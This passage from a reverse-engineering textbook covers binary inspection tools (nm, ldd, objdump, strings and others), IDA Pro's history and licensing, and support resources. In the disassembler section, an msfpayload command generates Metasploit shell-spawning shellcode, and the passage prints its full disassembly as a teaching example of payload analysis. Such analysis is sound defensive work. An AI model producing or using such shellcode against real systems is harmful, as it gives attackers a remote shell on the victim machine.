Nearly all forms of malware utilize obfuscation in an effort to hinder analysis. Tools

are widely available to assist program authors in generating obfuscated programs.

Obfuscation tools and techniques and their associated impact on the reverse engineering process will be discussed further in Chapter 21.

20 Chapter 2

Many additional capabilities of PEiD overlap those of PE Tools, including the ability to summarize PE file headers, collect information on running processes, and perform basic disassembly.

Summary Tools

Since our goal is to reverse engineer binary program files, we are going to

need more sophisticated tools to extract detailed information following initial

classification of a file. The tools discussed in this section, by necessity, are far

more aware of the formats of the files that they process. In most cases, these

tools understand a very specific file format, and the tools are utilized to parse

input files to extract very specific information.

nm

When source files are compiled to object files, compilers must embed information regarding the location of any global (external) symbols so that the linker will be able to resolve references to those symbols when it combines object files to create an executable. Unless instructed to strip symbols from the final executable, the linker generally carries symbols from the object files over into the resulting executable. According to the man page, the purpose of the nm utility is to “list symbols from object files.”

When nm is used to examine an intermediate object file (a .o file rather

than an executable), the default output yields the names of any functions

and global variables declared in the file. Sample output of the nm utility is

shown below:

idabook# gcc -c ch2_example.c

idabook# nm ch2_example.o

U __stderrp

U exit

U fprintf

00000038 T get_max

00000000 t hidden

00000088 T main

00000000 D my_initialized_global

00000004 C my_unitialized_global

U printf

U rand

U scanf

U srand

U time

00000010 T usage

idabook#

Here we see that nm lists each symbol along with some information about the symbol. The letter codes are used to indicate the type of symbol being listed. In this example, we see the following letter codes, which we will now explain:

U  An undefined symbol, usually an external symbol reference.
T  A symbol defined in the text section, usually a function name.
t  A local symbol defined in the text section. In a C program, this usually equates to a static function.
D  An initialized data value.
C  An uninitialized data value.

NOTE Uppercase letter codes are used for global symbols, whereas lowercase letter codes are used for local symbols. A full explanation of the letter codes can be found in the man page for nm.

Somewhat more information is displayed when nm is used to display symbols from an executable file. During the link process, symbols are resolved to virtual addresses (when possible), which results in more information being available when nm is run. Truncated example output from nm used on an executable is shown here:

idabook# gcc -o ch2_example ch2_example.c
idabook# nm ch2_example
<. . .>
         U exit
         U fprintf
080485c0 t frame_dummy
08048644 T get_max
0804860c t hidden
08048694 T main
0804997c D my_initialized_global
08049a9c B my_unitialized_global
08049a80 b object.2
08049978 d p.0
         U printf
         U rand
         U scanf
         U srand
         U time
0804861c T usage
idabook#

At this point, some of the symbols (main, for example) have been assigned virtual addresses, new ones (frame_dummy) have been introduced as a result of the linking process, some (my_unitialized_global) have had their symbol type changed, and others remain undefined as they continue to reference external symbols. In this case, the binary we are examining is dynamically linked, and the undefined symbols are defined in the shared C library. More information regarding nm can be found in its associated man page.
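To make the column layout of nm output concrete, here is a minimal Python sketch that splits lines of default nm output into an address, a letter code, and a symbol name. The helper names parse_nm_line and is_global are invented for this example, and the uppercase/lowercase rule simply follows the note above; the nm man page describes exceptions that this sketch does not handle.

```python
def parse_nm_line(line):
    """Split one line of default nm output into (address, code, name).

    Undefined symbols carry no address column, so their address is
    returned as None.
    """
    fields = line.split()
    if len(fields) == 2:
        code, name = fields
        return None, code, name
    if len(fields) == 3:
        address, code, name = fields
        return int(address, 16), code, name
    raise ValueError("unrecognized nm line: %r" % line)


def is_global(code):
    """Apply the rule of thumb from the text: uppercase codes are global."""
    return code.isupper()


if __name__ == "__main__":
    sample = ["U printf", "00000038 T get_max", "00000000 t hidden"]
    for entry in sample:
        address, code, name = parse_nm_line(entry)
        scope = "global" if is_global(code) else "local"
        print(name, code, scope, address)
```

Feeding the function the output of nm captured from a real object file should work the same way, provided nm was run with its default output format.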

ldd

When an executable is created, the location of any library functions referenced

by that executable must be resolved. The linker has two methods for resolving

calls to library functions: static linking and dynamic linking. Command-line

arguments provided to the linker determine which of the two methods is used.

An executable may be statically linked, dynamically linked, or both.[7]

When static linking is requested, the linker combines an application’s

object files with a copy of the required library to create an executable file.

At runtime, there is no need to locate the library code because it is already

contained within the executable. Advantages of static linking are that (1) it

results in slightly faster function calls and (2) distribution of binaries is easier

because no assumptions need be made regarding the availability of library

code on users’ systems. Disadvantages of static linking include (1) larger

resulting executables and (2) greater difficulty upgrading programs when

library components change. Programs are more difficult to update because

they must be relinked every time a library is changed. From a reverse engineering perspective, static linking complicates matters somewhat. If we are faced

with the task of analyzing a statically linked binary, there is no easy way to

answer the questions “Which libraries are linked into this binary?” and “Which

of these functions is a library function?” Chapter 12 will discuss the challenges

encountered while reverse engineering statically linked code.

Dynamic linking differs from static linking in that the linker has no need to make a copy of any required libraries. Instead, the linker simply inserts references to any required libraries (often .so or .dll files) into the final executable, usually resulting in much smaller executable files. Upgrading library code is much easier when dynamic linking is utilized. Since a single copy of a library is maintained and that copy is referenced by many binaries, replacing the single outdated library with a new version instantly updates every binary that makes use of that library. One of the disadvantages of using dynamic linking is that it requires a more complicated loading process. All of the necessary libraries must be located and loaded into memory, as opposed to loading one statically linked file that happens to contain all of the library code. Another disadvantage of dynamic linking is that vendors must distribute not only their own executable file but also all library files upon which that executable depends. Attempting to execute a program on a system that does not contain all the required library files will result in an error.

7. For more information on linking, consult John R. Levine, Linkers and Loaders (San Francisco: Morgan Kaufmann, 2000).

The following output demonstrates the creation of dynamically and statically linked versions of a program, the size of the resulting binaries, and the manner in which file identifies those binaries:

idabook# gcc -o ch2_example_dynamic ch2_example.c
idabook# gcc -o ch2_example_static ch2_example.c --static
idabook# ls -l ch2_example_*
-rwxr-xr-x 1 root wheel 6017 Sep 26 11:24 ch2_example_dynamic
-rwxr-xr-x 1 root wheel 167987 Sep 26 11:23 ch2_example_static
idabook# file ch2_example_*
ch2_example_dynamic: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), dynamically linked (uses shared libs), not stripped
ch2_example_static: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), statically linked, not stripped
idabook#
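One plausible way to tell the two kinds of binary apart is to look at the ELF program header table: dynamically linked executables normally carry a PT_INTERP entry (naming the runtime loader) and a PT_DYNAMIC entry. The Python sketch below does just that. It is an assumption-laden illustration, not a description of how file reaches its verdict, and the function names program_header_types and looks_dynamically_linked are invented here.

```python
import struct

PT_DYNAMIC = 2   # dynamic linking information
PT_INTERP = 3    # path of the program interpreter (runtime loader)


def program_header_types(data):
    """Return the p_type value of every ELF program header in data."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    is_64bit = data[4] == 2                   # EI_CLASS: 1 = 32-bit, 2 = 64-bit
    endian = "<" if data[5] == 1 else ">"     # EI_DATA: 1 = little-endian
    if is_64bit:
        (e_phoff,) = struct.unpack_from(endian + "Q", data, 32)
        e_phentsize, e_phnum = struct.unpack_from(endian + "HH", data, 54)
    else:
        (e_phoff,) = struct.unpack_from(endian + "I", data, 28)
        e_phentsize, e_phnum = struct.unpack_from(endian + "HH", data, 42)
    # p_type is the first 32-bit field of both the 32- and 64-bit entries.
    return [
        struct.unpack_from(endian + "I", data, e_phoff + i * e_phentsize)[0]
        for i in range(e_phnum)
    ]


def looks_dynamically_linked(data):
    """Heuristic: a PT_INTERP or PT_DYNAMIC entry suggests dynamic linking."""
    types = program_header_types(data)
    return PT_INTERP in types or PT_DYNAMIC in types
```

Some binaries (statically linked position-independent executables, for example) blur this distinction, so the result should be treated as a hint rather than a definitive classification.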

In order for dynamic linking to function properly, dynamically linked

binaries must indicate which libraries they depend on along with the specific

resources that are required from each of those libraries. As a result, unlike

statically linked binaries, it is quite simple to determine the libraries on which

a dynamically linked binary depends. The ldd (list dynamic dependencies) utility

is a simple tool used to list the dynamic libraries required by any executable.

In the following example, ldd is used to determine the libraries on which the

Apache web server depends:

idabook# ldd /usr/local/sbin/httpd

/usr/local/sbin/httpd:

libm.so.4 => /lib/libm.so.4 (0x280c5000)

libaprutil-1.so.2 => /usr/local/lib/libaprutil-1.so.2 (0x280db000)

libexpat.so.6 => /usr/local/lib/libexpat.so.6 (0x280ef000)

libiconv.so.3 => /usr/local/lib/libiconv.so.3 (0x2810d000)

libapr-1.so.2 => /usr/local/lib/libapr-1.so.2 (0x281fa000)

libcrypt.so.3 => /lib/libcrypt.so.3 (0x2821a000)

libpthread.so.2 => /lib/libpthread.so.2 (0x28232000)

libc.so.6 => /lib/libc.so.6 (0x28257000)

idabook#

The ldd utility is available on Linux and BSD systems. On OS X systems, similar functionality is available using the otool utility with the -L option: otool -L filename. On Windows systems, the dumpbin utility, part of the Visual Studio tool suite, can be used to list dependent libraries: dumpbin /dependents filename.
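When ldd output needs to be processed by a script, each dependency line can be broken into the library name, the resolved path, and the load address. The following Python sketch assumes output shaped like the httpd listing above (name => path (address)); other ldd variants print additional line formats that this sketch simply skips. The name parse_ldd_output is invented for this example.

```python
import re

# Matches lines such as: libm.so.4 => /lib/libm.so.4 (0x280c5000)
_LDD_LINE = re.compile(r"^\s*(\S+)\s+=>\s+(\S+)\s+\((0x[0-9a-fA-F]+)\)\s*$")


def parse_ldd_output(text):
    """Return a list of (library, path, load_address) tuples."""
    dependencies = []
    for line in text.splitlines():
        match = _LDD_LINE.match(line)
        if match:  # header lines and unrecognized formats are ignored
            name, path, address = match.groups()
            dependencies.append((name, path, int(address, 16)))
    return dependencies
```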

objdump

Whereas ldd is fairly specialized, objdump is extremely versatile. The purpose

of objdump is to “display information from object files.”[8] This is a fairly broad

goal, and in order to accomplish it, objdump responds to a large number (30+)

of command-line options tailored to extract various pieces of information

from object files. objdump can be used to display the following data (and much

more) related to object files:

Section headers
Summary information for each of the sections in the program file.

Private headers
Program memory layout information and other information required by the runtime loader, including a list of required libraries such as that produced by ldd.

Debugging information
Extracts any debugging information embedded in the program file.

Symbol information
Dumps symbol table information in a manner similar to the nm utility.

Disassembly listing
objdump performs a linear sweep disassembly of sections of the file marked as code. When disassembling x86 code, objdump can generate either AT&T or Intel syntax, and the disassembly can be captured as a text file. Such a text file is called a disassembly dead listing, and while these files can certainly be used for reverse engineering, they are difficult to navigate effectively and even more difficult to modify in a consistent and error-free manner.

8. See http://www.sourceware.org/binutils/docs/binutils/objdump.html#objdump/.

objdump is available as part of the GNU binutils[9] tool suite and can be

found on Linux, FreeBSD, and Windows (via Cygwin). objdump relies on the

Binary File Descriptor library (libbfd), a component of binutils, to access

object files and thus is capable of parsing file formats supported by libbfd

(ELF and PE among others). For ELF-specific parsing, a utility named readelf

is also available. readelf offers most of the same capabilities as objdump, and

the primary difference between the two is that readelf does not rely upon

libbfd.

otool

otool is most easily described as an objdump-like utility for OS X, and it is useful

for parsing information about OS X Mach-O binaries. The following listing

demonstrates how otool displays the dynamic library dependencies for a

Mach-O binary, thus performing a function similar to ldd.

idabook# file osx_example

osx_example: Mach-O executable ppc

idabook# otool -L osx_example

osx_example:

/usr/lib/libstdc++.6.dylib (compatibility version 7.0.0, current version 7.4.0)

/usr/lib/libgcc_s.1.dylib (compatibility version 1.0.0, current version 1.0.0)

/usr/lib/libSystem.B.dylib (compatibility version 1.0.0, current version 88.1.5)

otool can be used to display information related to a file’s headers and

symbol tables and to perform disassembly of the file’s code section. For more

information regarding the capabilities of otool, please refer to the associated

man page.

9. See http://www.gnu.org/software/binutils/.

dumpbin

dumpbin is a command-line utility included with Microsoft’s Visual Studio suite

of tools. Like otool and objdump, dumpbin is capable of displaying a wide range of

information related to Windows PE files. The following listing shows how

dumpbin displays the dynamic dependencies of the Windows calculator program

in a manner similar to ldd.

$ dumpbin /dependents calc.exe

Microsoft (R) COFF/PE Dumper Version 8.00.50727.762

Dump of file calc.exe

File Type: EXECUTABLE IMAGE

Image has the following dependencies:

SHELL32.dll

msvcrt.dll

ADVAPI32.dll

KERNEL32.dll

GDI32.dll

USER32.dll

Additional dumpbin options offer the ability to extract information from

various sections of a PE binary, including symbols, imported function names,

exported function names, and disassembled code. Additional information

related to the use of dumpbin is available via the Microsoft Developer Network

(MSDN).[10]

c++filt

Languages that allow function overloading must have a mechanism for distinguishing among the many overloaded versions of a function since each version has the same name. The following C++ example shows the prototypes for several overloaded versions of a function named demo:

void demo(void);

void demo(int x);

void demo(double x);

void demo(int x, double y);

void demo(double x, int y);

void demo(char* str);

10. See http://msdn.microsoft.com/en-us/library/c1h23y6c(VS.71).aspx.

As a general rule, it is not possible to have two functions with the same

name in an object file. In order to allow overloading, compilers derive unique

names for overloaded functions by incorporating information describing the

type sequence of the function arguments. The process of deriving unique

names for functions with identical names is called name mangling.[11] If we use

nm to dump the symbols from the compiled version of the preceding C++ code,

we might see something like the following (filtered to focus on versions of

demo):

idabook# g++ -o cpp_test cpp_test.cpp

idabook# nm cpp_test | grep demo

0804843c T _Z4demoPc

08048400 T _Z4demod

08048428 T _Z4demodi

080483fa T _Z4demoi

08048414 T _Z4demoid

080483f4 T _Z4demov

The C++ standard does not define standards for name-mangling schemes,

leaving compiler designers to develop their own. In order to decipher the

mangled variants of demo shown here, we need a tool that understands our

compiler’s (g++ in this case) name-mangling scheme. This is precisely the

purpose of the c++filt utility. c++filt treats each input word as if it were a

mangled name and then attempts to determine the compiler that was used

to generate that name. If the name appears to be a valid mangled name, it

outputs the demangled version of the name. When c++filt does not recognize a word as a mangled name, it simply outputs the word with no changes.

If we pass the results of nm from the preceding example through c++filt,

it is possible to recover the demangled function names, as seen here:

idabook# nm cpp_test | grep demo | c++filt

0804843c T demo(char*)

08048400 T demo(double)

08048428 T demo(double, int)

080483fa T demo(int)

08048414 T demo(int, double)

080483f4 T demo()

It is important to note that mangled names contain additional information about functions that nm does not normally provide. This information can be extremely helpful in reverse engineering situations, and in more complex cases, this extra information may include data regarding class names or function-calling conventions.
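To show how the argument types are recoverable from names like those in the listings above, here is a deliberately tiny Python sketch of a demangler. It handles only the pattern seen in this example (the _Z prefix, a length-prefixed function name, and a few single-letter built-in type codes, optionally preceded by P for "pointer to") as used by g++. It is nowhere near a complete implementation of the scheme, and the function name demangle_simple is invented here; real work should rely on c++filt.

```python
# Single-letter codes for a few built-in types; deliberately incomplete.
BUILTIN_TYPES = {
    "v": "void", "c": "char", "s": "short", "i": "int",
    "l": "long", "f": "float", "d": "double", "b": "bool",
}


def demangle_simple(name):
    """Demangle names of the form _Z<len><identifier><param codes>.

    Anything outside that tiny subset is returned unchanged, mirroring
    the way c++filt passes through words it does not recognize.
    """
    if not name.startswith("_Z"):
        return name
    pos = 2
    digits = ""
    while pos < len(name) and name[pos].isdigit():
        digits += name[pos]
        pos += 1
    if not digits:
        return name
    length = int(digits)
    identifier = name[pos:pos + length]
    if len(identifier) != length:
        return name
    pos += length
    params = []
    while pos < len(name):
        pointer_depth = 0
        while pos < len(name) and name[pos] == "P":   # P = pointer to
            pointer_depth += 1
            pos += 1
        if pos >= len(name) or name[pos] not in BUILTIN_TYPES:
            return name                                # unsupported construct
        params.append(BUILTIN_TYPES[name[pos]] + "*" * pointer_depth)
        pos += 1
    if not params:
        return name
    if params == ["void"]:                             # demo(void) prints as demo()
        params = []
    return "%s(%s)" % (identifier, ", ".join(params))
```

Running demangle_simple over the six mangled names in the nm listing reproduces the c++filt output shown above for this particular example.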

11. For an overview of name mangling, refer to http://en.wikipedia.org/wiki/Name_mangling.

Deep Inspection Tools

So far, we have discussed tools that perform a cursory analysis of files based

on minimal knowledge of those files’ internal structure. We have also seen

tools capable of extracting specific pieces of data from files based on very

detailed knowledge of a file’s structure. In this section we discuss tools

designed to extract specific types of information independently of the type

of file being analyzed.

strings

It is occasionally useful to ask more generic questions regarding file content,

questions that don’t necessarily require any specific knowledge of a file’s

structure. One such question is “Does this file contain any embedded strings?”

Of course, we must first answer the question “What exactly constitutes a

string?” Let’s loosely define a string as a consecutive sequence of printable

characters. This definition is often augmented to specify a minimum length

and a specific character set. Thus, we could specify a search for all sequences

of at least four consecutive ASCII printable characters and print the results to

the console. Searches for such strings are generally not limited in any way

by the structure of a file. You can search for strings in an ELF binary just as

easily as you can search for strings in a Microsoft Word document.

The strings utility is designed specifically to extract string content from

files, often without regard for the format of those files. Using strings with its

default settings (7-bit ASCII sequences of at least four characters) might yield

something like the following:

idabook# strings ch2_example

/lib/ld-linux.so.2

__gmon_start__

libc.so.6

_IO_stdin_used

exit

srand

puts

time

printf

stderr

fwrite

scanf

__libc_start_main

GLIBC_2.0

PTRh

[^_]

usage: ch2_example [max]

A simple guessing game!

Please guess a number between 1 and %d.

Invalid input, quitting!

Congratulations, you got it in %d attempt(s)!

Sorry too low, please try again

Sorry too high, please try again

Unfortunately, while we see some strings that look like they might be output by the program, other strings appear to be function names and library

names. We should be careful not to jump to any conclusions regarding the

behavior of the program. Analysts often fall into the trap of attempting to

deduce the behavior of a program based on the output of strings. Remember,

the presence of a string within a binary in no way indicates that the string is

ever used in any manner by that binary.

Some final notes on the use of strings:

• When using strings on executable files, it is important to remember that, by default, only the loadable, initialized sections of the file will be scanned. Use the -a command-line argument to force strings to scan the entire input file.

• strings gives no indication of where, within a file, a string is located. Use the -t command-line argument to have strings print file offset information for each string found.

• Many files utilize alternate character sets. Utilize the -e command-line argument to cause strings to search for wide characters such as 16-bit Unicode.
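The loose definition of a string given earlier (a run of at least four printable characters) is simple enough to sketch in a few lines of Python. The version below scans raw bytes without regard to file format, reports the file offset of each hit (in the spirit of -t), and can optionally look for 16-bit little-endian characters (in the spirit of -e). The name find_strings is invented for this example, and "printable" is assumed to mean bytes 0x20 through 0x7e, which may differ slightly from what the real utility accepts.

```python
import re


def find_strings(data, min_len=4, wide=False):
    """Return (offset, text) pairs for printable runs found in data.

    With wide=True, each character is expected to be a printable ASCII
    byte followed by a zero byte (16-bit little-endian encoding).
    """
    unit = rb"[\x20-\x7e]" + (rb"\x00" if wide else rb"")
    pattern = re.compile(rb"(?:" + unit + rb"){" + str(min_len).encode() + rb",}")
    encoding = "utf-16-le" if wide else "ascii"
    return [(m.start(), m.group().decode(encoding))
            for m in pattern.finditer(data)]
```

For example, find_strings(open("ch2_example", "rb").read()) would scan the entire file, which corresponds to running strings with the -a option.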

Disassemblers

As mentioned earlier, a number of tools are available to generate dead listing–

style disassemblies of binary object files. PE, ELF, and Mach-O binaries can

be disassembled using dumpbin, objdump, and otool, respectively. None of those,

however, can deal with arbitrary blocks of binary data. You will occasionally

be confronted with a binary file that does not conform to a widely used file

format, in which case you will need tools capable of beginning the disassembly process at user-specified offsets.

Two examples of such stream disassemblers for the x86 instruction set are ndisasm and diStorm.[12] ndisasm is a utility included with the Netwide Assembler (NASM).[13] The following example illustrates the use of ndisasm to disassemble a piece of shellcode generated using the Metasploit framework.[14]

idabook# ./msfpayload linux/x86/shell_findport CPORT=4444 R > fs
idabook# ls -l fs
-rw-r--r-- 1 ida ida 62 Dec 11 15:49 fs
idabook# ndisasm -u fs
00000000  31D2              xor edx,edx
00000002  52                push edx
00000003  89E5              mov ebp,esp
00000005  6A07              push byte +0x7
00000007  5B                pop ebx
00000008  6A10              push byte +0x10
0000000A  54                push esp
0000000B  55                push ebp
0000000C  52                push edx
0000000D  89E1              mov ecx,esp
0000000F  FF01              inc dword [ecx]
00000011  6A66              push byte +0x66
00000013  58                pop eax
00000014  CD80              int 0x80
00000016  66817D02115C      cmp word [ebp+0x2],0x5c11
0000001C  75F1              jnz 0xf
0000001E  5B                pop ebx
0000001F  6A02              push byte +0x2
00000021  59                pop ecx
00000022  B03F              mov al,0x3f
00000024  CD80              int 0x80
00000026  49                dec ecx
00000027  79F9              jns 0x22
00000029  52                push edx
0000002A  682F2F7368        push dword 0x68732f2f
0000002F  682F62696E        push dword 0x6e69622f
00000034  89E3              mov ebx,esp
00000036  52                push edx
00000037  53                push ebx
00000038  89E1              mov ecx,esp
0000003A  B00B              mov al,0xb
0000003C  CD80              int 0x80

12. See http://www.ragestorm.net/distorm/.

13. See http://nasm.sourceforge.net/.

14. See http://www.metasploit.com/.

The flexibility of stream disassembly is useful in many situations. One scenario involves the analysis of computer network attacks in which network packets may contain shellcode. Stream disassemblers can be used to disassemble the portions of the packet that contain shellcode in order to analyze the behavior of the malicious payload. Another situation involves the analysis of ROM images for which no layout reference can be located. Portions of the ROM will contain data, while other portions will contain code. Stream disassemblers can be used to disassemble just those portions of the image thought to be code.
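As a small worked example of analyzing such a payload, the constants in the ndisasm listing above can be decoded with a few lines of Python. The sketch below reassembles the two pushed dwords into the bytes they form on the stack, converts the immediate used in the cmp instruction into a port number, and names the Linux i386 system calls selected through eax. The helper names are invented for this illustration, and the reading of [ebp+0x2] as the port field of a socket address is an interpretation of the listing rather than something the listing states.

```python
import struct

# Linux i386 system call numbers loaded into eax/al in the listing.
LINUX_I386_SYSCALLS = {0x66: "socketcall", 0x3F: "dup2", 0x0B: "execve"}


def pushed_dwords_to_bytes(dwords_in_push_order):
    """Return the bytes as they sit in memory after a series of 32-bit pushes.

    The stack grows downward, so the last value pushed lands at the lowest
    address, and x86 stores each dword in little-endian byte order.
    """
    return b"".join(struct.pack("<I", value)
                    for value in reversed(dwords_in_push_order))


def port_from_cmp_immediate(imm16):
    """Interpret a 16-bit x86 immediate as a network-byte-order port.

    The immediate 0x5c11 is compared against the bytes 11 5c in memory,
    which read as the big-endian value 0x115c.
    """
    return struct.unpack(">H", struct.pack("<H", imm16))[0]


if __name__ == "__main__":
    print(pushed_dwords_to_bytes([0x68732F2F, 0x6E69622F]))
    print(port_from_cmp_immediate(0x5C11))
    print([LINUX_I386_SYSCALLS[n] for n in (0x66, 0x3F, 0x0B)])
```

The decoded values line up with what the msfpayload command line suggests: a port of 4444 (CPORT=4444) and a final execve of a shell path.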

Summary

The tools discussed in this chapter are not necessarily the best of their breed.

They do, however, represent tools commonly available for anyone who wishes

to reverse engineer binary files. More important, they represent the types of

tools that motivated much of the development of IDA. In the coming chapters,

we will discuss such tools. An awareness of these tools will greatly enhance

your understanding of the IDA user interface and the many informational

displays that IDA offers.

IDA PRO BACKGROUND

The Interactive Disassembler Professional, better and heretofore known as IDA Pro or simply IDA, is a product of Hex-Rays,[1] located in Liège, Belgium. The programming genius behind IDA is Ilfak Guilfanov, better known as simply Ilfak. IDA began its life over a decade ago as an MS-DOS, console-based application, which is significant in that it helps us understand something about the nature of IDA’s user interface. Among other things, non-GUI versions of IDA ship for all IDA-supported platforms[2] and continue to use the console-style interface derived from the original DOS versions.

At its heart, IDA is a recursive descent disassembler; however, a substantial amount of effort has gone into developing logic to augment the recursive-descent process. In order to overcome one of the larger shortcomings of recursive descent, IDA employs a large number of heuristic techniques to identify additional code that may not have been found during the recursive-descent process. Beyond the disassembly process itself, IDA goes to great lengths not only to distinguish data disassemblies from code disassemblies but also to determine exactly what type of data is being represented by those data disassemblies. While the code that you view in IDA is in assembly language, one of the fundamental goals of IDA is to paint a picture as close to source code as possible. IDA makes every effort to annotate generated disassemblies with not only datatype information but also derived variable and function names. These annotations minimize the amount of raw hex and maximize the amount of symbolic information presented to the user.

1. For many years, IDA was marketed by DataRescue; however, in January 2008, Ilfak moved marketing and sales of IDA to his own company, Hex-Rays.

2. Currently supported platforms are Windows, Linux, and OS X.

Hex-Rays’ Stance on Piracy

As an IDA user you should be aware of several facts. IDA is Hex-Rays’ flagship product; accordingly, the company is very sensitive about unauthorized distribution of IDA. In the past, the company has seen a direct cause-and-effect relationship between releases of pirated versions of IDA and declining sales. The former publisher of IDA, DataRescue, has even gone so far as to post the names of pirates to its Hall of Shame.[3] IDA thus utilizes several antipiracy techniques in an effort to curb piracy and enforce licensing restrictions.

The first technique to be aware of: Each copy of IDA is watermarked in

order to uniquely tie it to its purchaser. If a copy of IDA turns up on a warez

site, Hex-Rays has the ability to track that copy back to the original buyer,

who will then be blacklisted from future sales. It is not uncommon to find

discussions related to “leaked” copies of IDA on the IDA support forums at

Hex-Rays.

Another technique IDA uses to enforce its licensing policies involves

scanning for additional copies of IDA running on the local network. When

the Windows version of IDA is launched, a UDP packet is broadcast on

port 23945, and IDA waits for responses to see whether other instances of

IDA running under the same license key are present on the same subnet.

The number of responses is compared to the number of seats to which the

license applies, and if too many copies are found on the network, IDA will

refuse to start. Do note, however, that it is permissible to run multiple

instances of IDA on a single computer with a single license.

The final method of license enforcement centers on the use of key files

tied to each purchaser. At startup, IDA searches for a valid ida.key file. Failure

to locate a valid key file will cause IDA to shut down immediately. Key files

are also used in determining eligibility for upgraded copies of IDA. In essence,

ida.key represents your purchase receipt, and you should safeguard it to ensure

that you remain eligible for future upgrades.

3. The Hall of Shame has been migrated to the Hex-Rays website: http://www.hex-rays.com/idapro/hallofshame.html.

IDA Pro Background 33

Obtaining IDA Pro

First and foremost, IDA is not free software. The folks at Hex-Rays make their living in part through the sales of IDA. A limited-functionality, freeware[4] version of IDA is available for people who wish to familiarize themselves with its basic capabilities, but it doesn’t keep pace with the most recent versions. The freeware version, discussed more extensively in Appendix A, is a stripped-down edition of IDA 5.0 (the current version being 6.1). Along with the freeware version, Hex-Rays also distributes a restricted-functionality demonstration copy[5] of the current version. If the rave reviews that are found anywhere reverse engineering is discussed are not sufficient to convince you to purchase a copy, then spending some time with either the freeware or demo version will surely help you realize that IDA, and the customer support that comes along with it, is well worth owning.

IDA Versions

As of version 6.0, IDA is available in GUI and console versions for Windows, Linux, and OS X. IDA makes use of the Qt cross-platform GUI libraries to provide a consistent user interface on all three platforms. From a functionality standpoint, IDA Pro is offered in two versions: standard and advanced. The two versions differ primarily in the number of processor architectures for which they support disassembly. A quick look at the list of supported processors[6] shows that the standard version (approximately USD 540 as of this writing) supports more than 30 processor families, while the advanced version (at almost twice the price) supports more than 50. Additional architectures supported in the advanced version include x64, AMD64, MIPS, PPC, and SPARC, among others.

IDA Licenses

Two licensing options are available when you purchase IDA. From the Hex-Rays website:[7] “Named licenses are linked to a specific end-user and may be used on as many computers as that particular end-user uses,” while “Computer licenses are linked to a specific computer and may be used by different end-users on that computer provided only one user is active at any time.” Note that while a single named license entitles you to install the software on as many computers as you like, you are the only person who may run those copies of IDA, and, for a single license, IDA may be running on only one of those computers at any given time.

NOTE Unlike many other software licenses for proprietary software, IDA’s license specifically

grants users the right to reverse engineer IDA.

4. See http://www.hex-rays.com/idapro/idadownfreeware.htm.

5. See http://www.hex-rays.com/idapro/idadowndemo.htm.

6. See http://www.hex-rays.com/idapro/idaproc.htm.

7. See http://www.hex-rays.com/idapro/idaorder.htm.

Purchasing IDA

Prior to version 6.0, IDA purchases included a Windows GUI version along

with console versions for Windows, Linux, and OS X. Beginning with version

6.0, purchasers must specify exactly which operating system they wish to run

their copy of IDA on. Each copy of IDA 6.x includes console and Qt-based

GUI versions for the specified operating system only. Additional licenses for

alternate operating systems are available for a reduced price. You can purchase IDA through authorized distributors listed on the IDA sales web page

or directly from Hex-Rays by fax or email. Purchased copies can be delivered

via CD or downloaded, and they entitle the buyer to a year of support and

upgrades. In addition to the IDA installer, the CD distribution contains a

variety of extras such as the IDA software development kit (SDK) and other

utilities. Users who opt to download their purchased copy of IDA typically

receive only the installer bundle and are required to download other components separately.

Hex-Rays has been known to restrict sales to specific countries based on

its experiences with piracy in those countries. It also maintains a blacklist of

users who have violated the terms of licensing for IDA and may refuse to do

business with such users and/or their employers.

Upgrading IDA

The IDA Help menu contains an option to check for an available upgrade.

Additionally, IDA will automatically issue warnings that your support period is

about to expire based on the expiration date contained in your key file. The

upgrade process typically involves submitting your ida.key file to Hex-Rays,

which will then validate your key and provide you with details on how to obtain

your upgraded version. Should you find that your version of IDA is too old to

be eligible for an upgrade, be sure to take advantage of Hex-Rays’ reduced

upgrade pricing for holders of expired keys.

WARNING Failure to maintain close control over your key file could result in an unauthorized user

requesting your allotted upgrade, preventing you from upgrading your copy of IDA.

As a final note on upgrading any version of IDA, we highly recommend

backing up your existing IDA installation or installing your upgrade to a

completely different directory in order to avoid losing any configuration files

that you may have modified. You will need to edit the corresponding files in

your upgrade version to re-enable any changes that you have previously made.

Similarly you will need to move, recompile, or otherwise obtain new versions

of any custom IDA plug-ins that you may have been using (more about plug-

ins and the plug-in installation process in Chapter 17).
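Before re-applying your customizations, it helps to know which configuration files actually differ between the two installations. The following is a minimal sketch, not part of IDA itself; the function name and both directory arguments are our own illustrative choices, and you would pass the cfg directories of your old and new installations. Keep in mind that a reported difference may reflect new defaults shipped by Hex-Rays rather than a change you made.

```python
import filecmp
import os


def changed_config_files(old_cfg_dir, new_cfg_dir):
    """Return names of files present in both directories whose contents differ."""
    changed = []
    for name in sorted(os.listdir(old_cfg_dir)):
        old_path = os.path.join(old_cfg_dir, name)
        new_path = os.path.join(new_cfg_dir, name)
        if os.path.isfile(old_path) and os.path.isfile(new_path):
            # shallow=False forces a comparison of file contents,
            # not just size and modification time
            if not filecmp.cmp(old_path, new_path, shallow=False):
                changed.append(name)
    return changed
```

Each name returned is a candidate for manual review with your preferred diff tool.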

IDA Support Resources

As an IDA user, you may wonder where you can turn for help when you have

IDA-related questions. If we do our job well enough, this book will suffice in

most situations. When you find yourself needing additional help, though,

here are some popular resources:

Official help documentation

IDA ships with a menu-activated help system, but it is primarily an over-

view of the IDA user interface and the scripting subsystem. No help is

available for the IDA SDK, nor is much help available when you have

questions like “How do I do x?”

Hex-Rays’ support page and forums

Hex-Rays hosts a support page⁸ that offers links to various IDA-related

resources, including online forums available to licensed users. Users will

find that Ilfak and other core Hex-Rays programmers are frequent con-

tributors to the forums. The forums are also a good starting point for

unofficial support of the SDK, since many experienced IDA users are

more than willing to offer assistance based on their personal experiences.

Questions concerning use of the SDK are often answered with “Read

the include files.” The SDK is officially unsupported with a purchase of

IDA; however, Hex-Rays does offer a yearly support plan for an annual

fee of USD10,000 (yep, that’s right: $10K). An excellent resource to

familiarize yourself with the SDK is “IDA Plug-in Writing in C/C++” by

Steve Micallef.⁹

OpenRCE.org

A vibrant reverse engineering community exists at http://www.openrce.org/,

which contains numerous articles related to novel uses of IDA along with

active user forums. Similar to the forums at Hex-Rays, OpenRCE.org

attracts a large number of experienced IDA users who are often more

than willing to share their advice on how to resolve almost any problem

you may encounter with IDA.

RCE Forums

The Reverse Code Engineering (RCE) forums at http://www.woodmann

.com/ contain countless posts related to the use of IDA Pro. The focus of

the forums is much broader than the use of IDA Pro, however, with wide

